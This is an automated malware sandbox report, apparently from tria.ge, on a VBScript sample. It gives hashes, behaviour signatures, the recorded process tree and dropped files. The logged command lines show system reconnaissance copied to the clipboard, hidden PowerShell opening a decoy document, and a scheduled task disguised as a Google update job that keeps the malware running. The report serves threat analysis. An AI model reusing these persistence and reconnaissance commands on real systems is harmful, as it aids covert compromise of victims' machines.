Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    149s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240226-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
  • submitted
    10/04/2024, 13:22

General

  • Target

    acc72156d3ad82ec5a2da1bdf9572e4b4f4d49fb31cc62e00586c0e70ae9c6ff.vbs

  • Size

    64KB

  • MD5

    ab97956fec732676ecfcedf55efadcbc

  • SHA1

    d17cb1fa3eaaf4de326575f769a186abee09715a

  • SHA256

    acc72156d3ad82ec5a2da1bdf9572e4b4f4d49fb31cc62e00586c0e70ae9c6ff

  • SHA512

    997078883598a1d9d6f9ef139085b2f157ede45b72bfb9ca4b2ebbaced7fc4e349330be702832e309fdd9c09bb8b0c00d8dc7dacb7e0486276b0d48767774e74

  • SSDEEP

    768:Ekxs2aBaWJdSrorxX17vKzs8FuB8LgL0px+DE54UqO6zKSxgqDl:EkxRaQWJgEX17vKzs8oeLgLUUVbO6zKi

Score
7/10

Malware Config

Signatures

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Deletes itself 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Enumerates processes with tasklist 1 TTPs 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 12 IoCs
  • Modifies registry class 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 10 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SetWindowsHookEx 5 IoCs
  • Suspicious use of WriteProcessMemory 33 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\acc72156d3ad82ec5a2da1bdf9572e4b4f4d49fb31cc62e00586c0e70ae9c6ff.vbs"
    1⤵
    • Checks computer location settings
    • Deletes itself
    • Suspicious use of WriteProcessMemory
    PID:4412
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c tasklist /v | clip
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2908
      • C:\Windows\system32\tasklist.exe
        tasklist /v
        3⤵
        • Enumerates processes with tasklist
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2732
      • C:\Windows\system32\clip.exe
        clip
        3⤵
          PID:3664
      • C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" /c Route print | clip
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:3020
        • C:\Windows\system32\ROUTE.EXE
          Route print
          3⤵
            PID:4568
          • C:\Windows\system32\clip.exe
            clip
            3⤵
              PID:464
          • C:\Windows\System32\cmd.exe
            "C:\Windows\System32\cmd.exe" /c dir /w "C:\Windows/../Program Files" | clip
            2⤵
            • Suspicious use of WriteProcessMemory
            PID:4016
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /S /D /c" dir /w "C:\Windows/../Program Files" "
              3⤵
                PID:1316
              • C:\Windows\system32\clip.exe
                clip
                3⤵
                  PID:4768
              • C:\Windows\System32\cmd.exe
                "C:\Windows\System32\cmd.exe" /c dir /w "C:\Windows/../Program Files (x86)" | clip
                2⤵
                • Suspicious use of WriteProcessMemory
                PID:4320
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /S /D /c" dir /w "C:\Windows/../Program Files (x86)" "
                  3⤵
                    PID:3416
                  • C:\Windows\system32\clip.exe
                    clip
                    3⤵
                      PID:4148
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden C:\Users\Admin\AppData\Local\Temp\2022.hwp
                    2⤵
                    • Modifies registry class
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:3328
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden <table width="730" border="0" cellspacing="0" cellpadding="0"> <!-- Error title --> <tbody><tr> <td width="60" align="left" id="infoIconAlign" valign="top" rowspan="2"> <img id="infoIcon" alt="Info icon" src="info_48.png"> </td> <td width="*" align="left" id="mainTitleAlign" valign="middle"> <h1 id="mainTitle">The website cannot display the page</h1> </td> </tr> <tr> <!-- This row is for HTTP status code, as well as the divider--> <td align="right" class="errorCodeAndDivider" id="http405Align"><id id="http405"> HTTP 405</id> <div class="divider"></div> </td> </tr> <!-- Error Body --> <tr> <td> </td> <td align="left" id="mostlikelyAlign" valign="top"> <h3><id id="mostlikely">Most likely cause:</id></h3> <ul> <li><id id="programerror">The website has a programming error.</id></li> </ul> </td> </tr> <!-- What you can do --> <tr> <td> </td> <td align="left" id="whatToTryAlign" valign="top"> <h2 id="whatToTry">What you can try:</h2> </td> </tr> <!-- back to previous page --> <tr> <td> </td> <td align="left" id="goBackAlign" valign="middle"> <h4> <table> <tbody><tr> <td valign="top"> <img class="actionIcon" alt="" src="bullet.png" border="0"> </td> <td valign="top"> <span id="goBackContainer"><a href="javascript:history.back();">Go back to the previous page.</a></span><noscript id="goBack">Go back to the previous page.</noscript> </td> </tr> </tbody></table> </h4> </td> </tr> <!-- InfoBlock --> <tr> <td align="right" id="infoBlockAlign" valign="top"> </td> <td align="left" id="moreInfoAlign" valign="middle"> <h4> <table> <tbody><tr> <td valign="top"> <a onclick="javascript:expandCollapse('infoBlockID', true); return false;" href="#"><img class="actionIcon" id="infoBlockIDImage" alt="More information" src="down.png" border="0"></a> </td> <td valign="top"> <span id="moreInfoContainer"><a href="javascript:expandCollapse('infoBlockID', true);">More information</a></span> <noscript><ID id="moreInformation">More information</ID></noscript> </td> </tr> </tbody></table> </h4> <div class="infoBlock" id="infoBlockID" style="display: none;"> <p id="errorExplanation">This error (HTTP 405 Method Not Allowed) means that Internet Explorer was able to connect to the website, but the site has a programming error.</p> <p id="moreInfoSeeHelp">For more information about HTTP errors, see Help.</p> </div> </td> </tr> </tbody></table>
                    2⤵
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:2160
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden $a = New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\mscornet.vbs';$t1 = New-ScheduledTaskTrigger -Daily -At 10AM;$t2 = New-ScheduledTaskTrigger -Daily -At 11AM;$t3 = New-ScheduledTaskTrigger -Daily -At 3PM;$t4 = New-ScheduledTaskTrigger -Daily -At 4PM;$t5 = New-ScheduledTaskTrigger -Daily -At 5PM;$t6 = New-ScheduledTaskTrigger -AtLogOn;$d = 'Export the 10 newest events in the application logs';Register-ScheduledTask -Action $a -TaskName 'Google Update Source Link' -Trigger $t1,$t2,$t3,$t4,$t5,$t6 -Description $d;
                    2⤵
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:4368
                • C:\Program Files (x86)\Internet Explorer\ielowutil.exe
                  "C:\Program Files (x86)\Internet Explorer\ielowutil.exe" -CLSID:{0002DF01-0000-0000-C000-000000000046} -Embedding
                  1⤵
                    PID:1268
                  • C:\Program Files\Internet Explorer\iexplore.exe
                    "C:\Program Files\Internet Explorer\iexplore.exe" -Embedding
                    1⤵
                    • Modifies Internet Explorer settings
                    • Suspicious use of FindShellTrayWindow
                    • Suspicious use of SetWindowsHookEx
                    • Suspicious use of WriteProcessMemory
                    PID:4756
                    • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                      "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:4756 CREDAT:17410 /prefetch:2
                      2⤵
                      • Modifies Internet Explorer settings
                      • Suspicious use of SetWindowsHookEx
                      PID:4892
                  • C:\Windows\system32\OpenWith.exe
                    C:\Windows\system32\OpenWith.exe -Embedding
                    1⤵
                    • Modifies registry class
                    • Suspicious use of SetWindowsHookEx
                    PID:5068

                  Network

                  MITRE ATT&CK Enterprise v15

                  Replay Monitor

                  Loading Replay Monitor...

                  Downloads

                  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                    Filesize

                    2KB

                    MD5

                    d85ba6ff808d9e5444a4b369f5bc2730

                    SHA1

                    31aa9d96590fff6981b315e0b391b575e4c0804a

                    SHA256

                    84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

                    SHA512

                    8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                    Filesize

                    64B

                    MD5

                    50a8221b93fbd2628ac460dd408a9fc1

                    SHA1

                    7e99fe16a9b14079b6f0316c37cc473e1f83a7e6

                    SHA256

                    46e488628e5348c9c4dfcdeed5a91747eae3b3aa49ae1b94d37173b6609efa0e

                    SHA512

                    27dda53e7edcc1a12c61234e850fe73bf3923f5c3c19826b67f2faf9e0a14ba6658001a9d6a56a7036409feb9238dd452406e88e318919127b4a06c64dba86f0

                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                    Filesize

                    948B

                    MD5

                    44cd935b8b295e024c793a8038cbeed8

                    SHA1

                    dd4dfeb934e2e5fc83cb7d3e7c4a10dd5db6a5d3

                    SHA256

                    f8f56bbc223c56d860b9f71fb4c5f1809c0be7aae71f6bc0ec2e3b163aa9b3dd

                    SHA512

                    9285020e7455e6fc2c235256dcca37a8cf2f341cb09345b1182ca8b43f260dcbb5aca2dfe508d616d9df868daad7e5b7b6b6e1518e4ccca98aed3854eed323d0

                  • C:\Users\Admin\AppData\Local\Temp\2022.hwp

                    Filesize

                    45KB

                    MD5

                    5097e5a2eb414a40db840408b29355c1

                    SHA1

                    761345512219b2e4616707dbb3f9fb87b807404c

                    SHA256

                    12c54133a7ca59edbc7bd28a6901ecfc883ca4e4f742b2bc2a7acd95acc75417

                    SHA512

                    cf68b2aaed094e86833a89e0804319dd93a9412f297774661968575a66659b07a5038f44ff70de6f2a4653353ceecdaedeb23dfc342e13d4bb0a965f676cbda3

                  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_zfbtf0ht.zjc.ps1

                    Filesize

                    60B

                    MD5

                    d17fe0a3f47be24a6453e9ef58c94641

                    SHA1

                    6ab83620379fc69f80c0242105ddffd7d98d5d9d

                    SHA256

                    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                    SHA512

                    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                  • memory/2160-43-0x00007FF9402E0000-0x00007FF940DA1000-memory.dmp

                    Filesize

                    10.8MB

                  • memory/2160-38-0x00007FF9402E0000-0x00007FF940DA1000-memory.dmp

                    Filesize

                    10.8MB

                  • memory/2160-39-0x000001ECC93C0000-0x000001ECC93D0000-memory.dmp

                    Filesize

                    64KB

                  • memory/2160-40-0x000001ECC93C0000-0x000001ECC93D0000-memory.dmp

                    Filesize

                    64KB

                  • memory/3328-19-0x00007FF940910000-0x00007FF9413D1000-memory.dmp

                    Filesize

                    10.8MB

                  • memory/3328-15-0x00000269DCEC0000-0x00000269DCED0000-memory.dmp

                    Filesize

                    64KB

                  • memory/3328-14-0x00000269DCEC0000-0x00000269DCED0000-memory.dmp

                    Filesize

                    64KB

                  • memory/3328-13-0x00007FF940910000-0x00007FF9413D1000-memory.dmp

                    Filesize

                    10.8MB

                  • memory/3328-12-0x00000269DD100000-0x00000269DD122000-memory.dmp

                    Filesize

                    136KB

                  • memory/4368-49-0x00007FF9402E0000-0x00007FF940DA1000-memory.dmp

                    Filesize

                    10.8MB

                  • memory/4368-54-0x00000247352F0000-0x0000024735300000-memory.dmp

                    Filesize

                    64KB

                  • memory/4368-56-0x00000247352F0000-0x0000024735300000-memory.dmp

                    Filesize

                    64KB

                  • memory/4368-58-0x00007FF9402E0000-0x00007FF940DA1000-memory.dmp

                    Filesize

                    10.8MB